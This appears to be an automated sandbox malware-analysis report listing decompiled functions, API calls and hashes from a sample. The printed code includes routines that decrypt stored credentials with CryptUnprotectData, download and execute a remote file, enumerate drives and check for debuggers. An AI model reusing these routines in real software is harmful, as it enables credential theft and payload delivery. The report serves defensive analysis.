                                                                    • Opcode ID: 08cb5d6e981a7abc8371e9f733253ae5527597428ec71c816ddaa71cff057027
                                                                    • Instruction ID: bb88271a4a18498de59111baf34231d7835bab446dc9644b3ccaceda59b32582
                                                                    • Opcode Fuzzy Hash: 08cb5d6e981a7abc8371e9f733253ae5527597428ec71c816ddaa71cff057027
                                                                    • Instruction Fuzzy Hash: 3601D671941134ABE7319660AC09FDA77FCDF64714F0100A0FE45E1280EF30DE98CA64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00412480 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 461COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c:A$c:A
                                                                    • API String ID: 0-2800959067
                                                                    • Opcode ID: e4da9a3ece603e5253f13d06d2bf8e39c6af38c700a65b5cea5a23b816b3bc5a
                                                                    • Instruction ID: 2fe37773bd22612b91168216a29c41222d0753e8c452c883c51a6ff0870718b2
                                                                    • Opcode Fuzzy Hash: e4da9a3ece603e5253f13d06d2bf8e39c6af38c700a65b5cea5a23b816b3bc5a
                                                                    • Instruction Fuzzy Hash: 76023971E002199FDF14CFA9C9806EEB7F1FF88314F25826AD829E7380D775A9518B94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1A632 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62memoryencryptionstringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 24%
                                                                    			E02D1A632(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v8216;
				char* _t24;
				signed int _t27;
				WCHAR* _t29;
				intOrPtr _t30;
				signed int* _t31;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t39;

				_t30 = __ecx;
				E02D11190(0x2014, __ecx);
				_t36 = _a4;
				_t29 = __edx;
				_v8 = _t30;
				_t3 = _t36 - 1; // -1
				_t34 = GlobalAlloc(0x40, _t3);
				_t38 = 1;
				if(_t36 > 1) {
					_t32 = _v8;
					do {
						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
						_t38 = _t38 + 1;
					} while (_t38 < _t36);
				}
				_t8 = _t36 - 1; // -1
				_v12 = _t34;
				_v16 = _t8;
				_t39 = 0;
				_t24 =  &_v16;
				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);
				if(_t24 == 0) {
					_push(L"Could not decrypt");
				} else {
					if(_t36 > 0) {
						_t35 = _v20;
						_t31 =  &_v8216;
						do {
							_t27 =  *(_t35 + _t39) & 0x000000ff;
							_t39 = _t39 + 2;
							 *_t31 = _t27;
							_t31 =  &(_t31[0]);
						} while (_t39 < _t36);
					}
					_push( &_v8216);
				}
				return lstrcpyW(_t29, ??);
			}




















                                                                    0x02d1a632
                                                                    0x02d1a63a
                                                                    0x02d1a642
                                                                    0x02d1a645
                                                                    0x02d1a647
                                                                    0x02d1a64a
                                                                    0x02d1a658
                                                                    0x02d1a65a
                                                                    0x02d1a65d
                                                                    0x02d1a65f
                                                                    0x02d1a662
                                                                    0x02d1a665
                                                                    0x02d1a669
                                                                    0x02d1a66a
                                                                    0x02d1a662
                                                                    0x02d1a66e
                                                                    0x02d1a671
                                                                    0x02d1a674
                                                                    0x02d1a677
                                                                    0x02d1a682
                                                                    0x02d1a686
                                                                    0x02d1a68e
                                                                    0x02d1a6b7
                                                                    0x02d1a690
                                                                    0x02d1a692
                                                                    0x02d1a694
                                                                    0x02d1a697
                                                                    0x02d1a69d
                                                                    0x02d1a69d
                                                                    0x02d1a6a1
                                                                    0x02d1a6a4
                                                                    0x02d1a6a7
                                                                    0x02d1a6aa
                                                                    0x02d1a69d
                                                                    0x02d1a6b4
                                                                    0x02d1a6b4
                                                                    0x02d1a6c7

                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,-00000001,745CE730,?,?,?,02D1A5E6,00001000,?,00000000,00001000), ref: 02D1A650
                                                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,02D1A5E6), ref: 02D1A686
                                                                    • lstrcpyW.KERNEL32 ref: 02D1A6BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                                                    • String ID: Could not decrypt
                                                                    • API String ID: 3112367126-1484008118
                                                                    • Opcode ID: f6714edca229872afa110b3b18dd54a3f3456612d63dd0265e9a4b51b924e2d9
                                                                    • Instruction ID: fbdb54472394a0ffd655464894079858720b187d24485f753ff28fe57ac8578a
                                                                    • Opcode Fuzzy Hash: f6714edca229872afa110b3b18dd54a3f3456612d63dd0265e9a4b51b924e2d9
                                                                    • Instruction Fuzzy Hash: D511C672D01669ABC721CBA8D9809AEF7BCEF58704B114566D956E3301E7319E05CBB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040AAE3 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040AB0C
                                                                    • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0040AB24
                                                                    • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 0040AB7A
                                                                    • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 0040AB8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$AllocInfoProtectQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 3562403962-0
                                                                    • Opcode ID: 0134596d88bd9379e937d24a595022f0e1472751ad23ccb639c4b92f600b1ab5
                                                                    • Instruction ID: b8fe15ab3f8e7473abd2c09fcd97057fc673d9731f333d2d124805e491acea3b
                                                                    • Opcode Fuzzy Hash: 0134596d88bd9379e937d24a595022f0e1472751ad23ccb639c4b92f600b1ab5
                                                                    • Instruction Fuzzy Hash: B321A872E40219ABCF20DFA5CC85AEFB7B9EB44754F01007AEA05F7180EB34A904C7A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407DBF Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00407DCB
                                                                    • IsDebuggerPresent.KERNEL32 ref: 00407E97
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00407EB7
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00407EC1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 6c0b653815d37ff36d20c72271f8328257ee6dcda395897a9847d5dfb99108c1
                                                                    • Instruction ID: ce3531b34b27b70b50f1634ac06ac852a7cffe9a67bf8a2d50cf32989af2b1f6
                                                                    • Opcode Fuzzy Hash: 6c0b653815d37ff36d20c72271f8328257ee6dcda395897a9847d5dfb99108c1
                                                                    • Instruction Fuzzy Hash: 6D311875D4521C9BDB10DFA4D9897CDBBB8AF08304F1081EAE50CAB290EB749A85CF49
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1F56D Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1F56D(void* __ecx, void* __eflags) {
				void* _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				long _v20;
				long _v24;
				union _SID_NAME_USE _v28;
				short _v60;
				short _v580;
				void* _t37;

				_v20 = 0x10;
				_v8 = 0;
				_t37 = __ecx;
				_v16.Value = 0;
				_v12 = 0x500;
				E02D11052( &_v580, 0, 0x208);
				_v24 = 0x104;
				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
					GetLastError();
				}
				if(_v8 != 0) {
					FreeSid(_v8);
				}
				E02D135E5(_t37,  &_v580);
				return _t37;
			}












                                                                    0x02d1f57a
                                                                    0x02d1f58c
                                                                    0x02d1f591
                                                                    0x02d1f593
                                                                    0x02d1f596
                                                                    0x02d1f59c
                                                                    0x02d1f5a4
                                                                    0x02d1f5ca
                                                                    0x02d1f5f1
                                                                    0x02d1f5f1
                                                                    0x02d1f5fa
                                                                    0x02d1f5ff
                                                                    0x02d1f5ff
                                                                    0x02d1f60e
                                                                    0x02d1f618

                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,02D1D471,?,?,00000001), ref: 02D1F5C2
                                                                    • LookupAccountSidW.ADVAPI32(00000000,02D1D471,?,00000104,?,00000010,?), ref: 02D1F5E7
                                                                    • GetLastError.KERNEL32(?,?,00000001), ref: 02D1F5F1
                                                                    • FreeSid.ADVAPI32(02D1D471,?,?,00000001), ref: 02D1F5FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                                                    • String ID:
                                                                    • API String ID: 1866703397-0
                                                                    • Opcode ID: 2e6b11613bc10c16358b7cc6fdf5ac1af1ff994601aa3292f33a340334703650
                                                                    • Instruction ID: 7d9dd636546a47f30580401e66126bd5cbe0b5f6c56b79e05ad48dd48f3f992a
                                                                    • Opcode Fuzzy Hash: 2e6b11613bc10c16358b7cc6fdf5ac1af1ff994601aa3292f33a340334703650
                                                                    • Instruction Fuzzy Hash: 7E11FBB1D0020DBBDB10DFD1E989AEEB7BCEB04304F100466E605E2240E7709E488BA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1CC54 Relevance: 6.0, APIs: 4, Instructions: 49encryptionmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 37%
                                                                    			E02D1CC54(intOrPtr __ecx, void** __edx, long* _a4) {
				intOrPtr _v8;
				void* _t6;
				void* _t8;
				long* _t9;
				void* _t13;
				void** _t14;
				void* _t16;
				void* _t17;

				_t9 = _a4;
				_t17 = 0;
				_v8 = __ecx;
				_t14 = __edx;
				 *_t9 = 0;
				 *((intOrPtr*)(__edx)) = 0;
				__imp__CryptStringToBinaryW(__ecx, 0, 1, 0, _t9, 0, 0, _t13, _t16, _t8, __ecx);
				if(__ecx != 0) {
					_t6 = LocalAlloc(0x40,  *_t9);
					 *_t14 = _t6;
					if(_t6 != 0) {
						__imp__CryptStringToBinaryW(_v8, 0, 1, _t6, _t9, 0, 0);
						_t17 = _t6;
						if(_t17 == 0) {
							 *_t14 = LocalFree( *_t14);
						}
					}
				}
				return _t17;
			}











                                                                    0x02d1cc59
                                                                    0x02d1cc60
                                                                    0x02d1cc62
                                                                    0x02d1cc6b
                                                                    0x02d1cc6d
                                                                    0x02d1cc71
                                                                    0x02d1cc73
                                                                    0x02d1cc7b
                                                                    0x02d1cc81
                                                                    0x02d1cc87
                                                                    0x02d1cc8b
                                                                    0x02d1cc97
                                                                    0x02d1cc9d
                                                                    0x02d1cca1
                                                                    0x02d1ccab
                                                                    0x02d1ccab
                                                                    0x02d1cca1
                                                                    0x02d1cc8b
                                                                    0x02d1ccb3

                                                                    APIs
                                                                    • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D1CC73
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,02D1CBC6,?,00000000,?,00000000,?), ref: 02D1CC81
                                                                    • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 02D1CC97
                                                                    • LocalFree.KERNEL32(?,?,02D1CBC6,?,00000000,?,00000000,?), ref: 02D1CCA5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: BinaryCryptLocalString$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 4291131564-0
                                                                    • Opcode ID: 1b08b8e97dc689faa290b21b36e27f8507ec2119ec2a44eacc9ea7b3179746f8
                                                                    • Instruction ID: 7d83f06d506d4b945de60dee2a9c62ad3d3b970667df5064fb7607d7b3ea8f60
                                                                    • Opcode Fuzzy Hash: 1b08b8e97dc689faa290b21b36e27f8507ec2119ec2a44eacc9ea7b3179746f8
                                                                    • Instruction Fuzzy Hash: 0401F671641222BFEB314B5ADD49E97BFADEF197A1B110421F908D6350E7718C10CAA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D127D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82filenetworkCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E02D127D3(void* __ecx, void* __eflags, signed int _a4) {
				short* _v12;
				void* _v16;
				char _v20;
				void* _t26;
				void* _t36;
				void* _t38;
				void* _t42;
				void* _t58;
				void* _t59;

				_t66 = __eflags;
				_t42 = __ecx;
				_t58 = 0x1a;
				E02D1F76B( &_v12, _t58, __eflags);
				_t59 = 0xa;
				_t26 = E02D134A7( &_v16, _t59, __eflags);
				E02D13335(E02D1346A( &_v12, _t59, _t66, "\\"), _t66, _t26);
				E02D15EA5(_v16);
				_t61 = _a4 + 4;
				E02D1362D( &_v16, _a4 + 4);
				E02D13335( &_v12, _t66, E02D1351D( &_v16,  &_a4));
				E02D15EA5(_a4);
				_a4 = _a4 & 0x00000000;
				E02D15EA5(_v16);
				_t36 = E02D1362D( &_a4, _t61);
				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);
				E02D15EA5(_a4);
				if(_t36 == 0) {
					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);
					_v16 = 2;
					__eflags = _t38 - 0x20;
					if(_t38 > 0x20) {
						_v16 = 0;
					}
				} else {
					_v16 = 1;
				}
				_v20 = 0x2d247d8;
				E02D14F2B(_t42,  &_v20);
				return E02D15EA5(_v12);
			}












                                                                    0x02d127d3
                                                                    0x02d127dc
                                                                    0x02d127e3
                                                                    0x02d127e4
                                                                    0x02d127eb
                                                                    0x02d127ef
                                                                    0x02d12806
                                                                    0x02d1280e
                                                                    0x02d12819
                                                                    0x02d1281d
                                                                    0x02d12832
                                                                    0x02d1283a
                                                                    0x02d12842
                                                                    0x02d12846
                                                                    0x02d12852
                                                                    0x02d12860
                                                                    0x02d1286b
                                                                    0x02d12872
                                                                    0x02d1288a
                                                                    0x02d12890
                                                                    0x02d12897
                                                                    0x02d1289a
                                                                    0x02d1289c
                                                                    0x02d1289c
                                                                    0x02d12874
                                                                    0x02d12874
                                                                    0x02d12874
                                                                    0x02d128a2
                                                                    0x02d128ac
                                                                    0x02d128bd

                                                                    APIs
                                                                      • Part of subcall function 02D1F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,00000000,?), ref: 02D1F79C
                                                                      • Part of subcall function 02D13335: lstrcatW.KERNEL32(00000000,745D0770), ref: 02D13365
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D1351D: PathFindExtensionW.SHLWAPI(?,?,02D1282E,?,?,00000000,02D24684), ref: 02D13527
                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 02D12860
                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 02D1288A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                                                    • String ID: open
                                                                    • API String ID: 4166385161-2758837156
                                                                    • Opcode ID: 5eef882425b1bfacfdd930e768d8035ad62a242c773a149bfd299ee58fc11c6a
                                                                    • Instruction ID: c833151196680b954ddabf25458c87f14d86a51650e5b9836186da3b67d99e0d
                                                                    • Opcode Fuzzy Hash: 5eef882425b1bfacfdd930e768d8035ad62a242c773a149bfd299ee58fc11c6a
                                                                    • Instruction Fuzzy Hash: DF215C71D00218BBDB14AFA1E884DEE7B7AEFD1714F018099E81667780DB345E49CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407269 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040735F: GetLastError.KERNEL32 ref: 00407371
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0040118D), ref: 0040729C
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040118D), ref: 004072AB
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 004072A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 389471666-631824599
                                                                    • Opcode ID: a767473c31afe462ed5c59052da0bbfae9cde02be0223a21480e5810e46b0c85
                                                                    • Instruction ID: 552a288e0f0e51fb3f1ce2b7436c22c16934ba3ff4c49672663a84e09985d18d
                                                                    • Opcode Fuzzy Hash: a767473c31afe462ed5c59052da0bbfae9cde02be0223a21480e5810e46b0c85
                                                                    • Instruction Fuzzy Hash: 71E09B706047118FD3609F35E8447827AE4AF04344F00C87FE849D2780DBB8E448CBBA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D2002B Relevance: 4.6, APIs: 3, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E02D2002B(intOrPtr __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				WCHAR* _t33;
				intOrPtr _t34;
				int _t44;
				WCHAR* _t54;
				signed int _t72;
				intOrPtr _t74;
				int _t75;
				long _t76;
				WCHAR* _t77;
				void* _t78;
				void* _t79;

				_t74 = __ecx;
				_v12 = __ecx;
				_t33 = E02D15F53(0x208);
				_v32 = _v32 & 0x00000000;
				_t54 = _t33;
				_t34 = 5;
				_v28 = _t34;
				_v36 = _t34;
				E02D119F6( &_v40, __eflags);
				_t76 = GetLogicalDriveStringsW(0x104, _t54);
				_t81 = _t76 - 0x104;
				if(_t76 > 0x104) {
					_t72 = 2;
					_t54 = E02D15F53( ~(0 | _t81 > 0x00000000) | _t36 * _t72);
					GetLogicalDriveStringsW(_t76, _t54);
				}
				_t77 = 0;
				if( *_t54 != 0) {
					do {
						_v24 = _t77;
						E02D13437( &_v24, E02D135E5( &_v8, _t54));
						E02D15EA5(_v8);
						_v8 = _t77;
						_t44 = GetDriveTypeW(_v24);
						_t79 = _t79 - 0xc;
						_t75 = _t44;
						_t78 = _t79;
						_v20 = _t75;
						E02D1362D(_t78,  &_v24);
						 *(_t78 + 4) = _t75;
						 *((intOrPtr*)(_t78 + 8)) = _v16;
						E02D11903( &_v40);
						_t54 =  &(( &(_t54[E02D13261( &_v24)]))[1]);
						E02D15EA5(_v24);
						_t77 = 0;
						_v24 = 0;
						_t84 =  *_t54;
					} while ( *_t54 != 0);
					_t74 = _v12;
				}
				E02D113A8(_t74, _t84,  &_v40);
				_t60 = _v40;
				if(_v40 != 0) {
					E02D11B00(_t60, _t60);
				}
				return _t74;
			}























                                                                    0x02d20034
                                                                    0x02d2003b
                                                                    0x02d2003e
                                                                    0x02d20043
                                                                    0x02d2004c
                                                                    0x02d2004e
                                                                    0x02d2004f
                                                                    0x02d20052
                                                                    0x02d20055
                                                                    0x02d20066
                                                                    0x02d20068
                                                                    0x02d2006e
                                                                    0x02d20074
                                                                    0x02d20083
                                                                    0x02d20087
                                                                    0x02d20087
                                                                    0x02d2008d
                                                                    0x02d20092
                                                                    0x02d20094
                                                                    0x02d20098
                                                                    0x02d200a4
                                                                    0x02d200ac
                                                                    0x02d200b4
                                                                    0x02d200b7
                                                                    0x02d200bd
                                                                    0x02d200c0
                                                                    0x02d200c2
                                                                    0x02d200c4
                                                                    0x02d200cd
                                                                    0x02d200d8
                                                                    0x02d200db
                                                                    0x02d200de
                                                                    0x02d200f1
                                                                    0x02d200f4
                                                                    0x02d200f9
                                                                    0x02d200fb
                                                                    0x02d200fe
                                                                    0x02d200fe
                                                                    0x02d20103
                                                                    0x02d20103
                                                                    0x02d2010c
                                                                    0x02d20111
                                                                    0x02d20116
                                                                    0x02d20119
                                                                    0x02d20119
                                                                    0x02d20124

                                                                    APIs
                                                                      • Part of subcall function 02D15F53: GetProcessHeap.KERNEL32(00000000,000000F4,02D20477,?,745D0770,00000000,02D15A34), ref: 02D15F56
                                                                      • Part of subcall function 02D15F53: HeapAlloc.KERNEL32(00000000), ref: 02D15F5D
                                                                    • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 02D20060
                                                                    • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 02D20087
                                                                    • GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 02D200B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Drive$HeapLogicalStrings$AllocProcessType
                                                                    • String ID:
                                                                    • API String ID: 2408535517-0
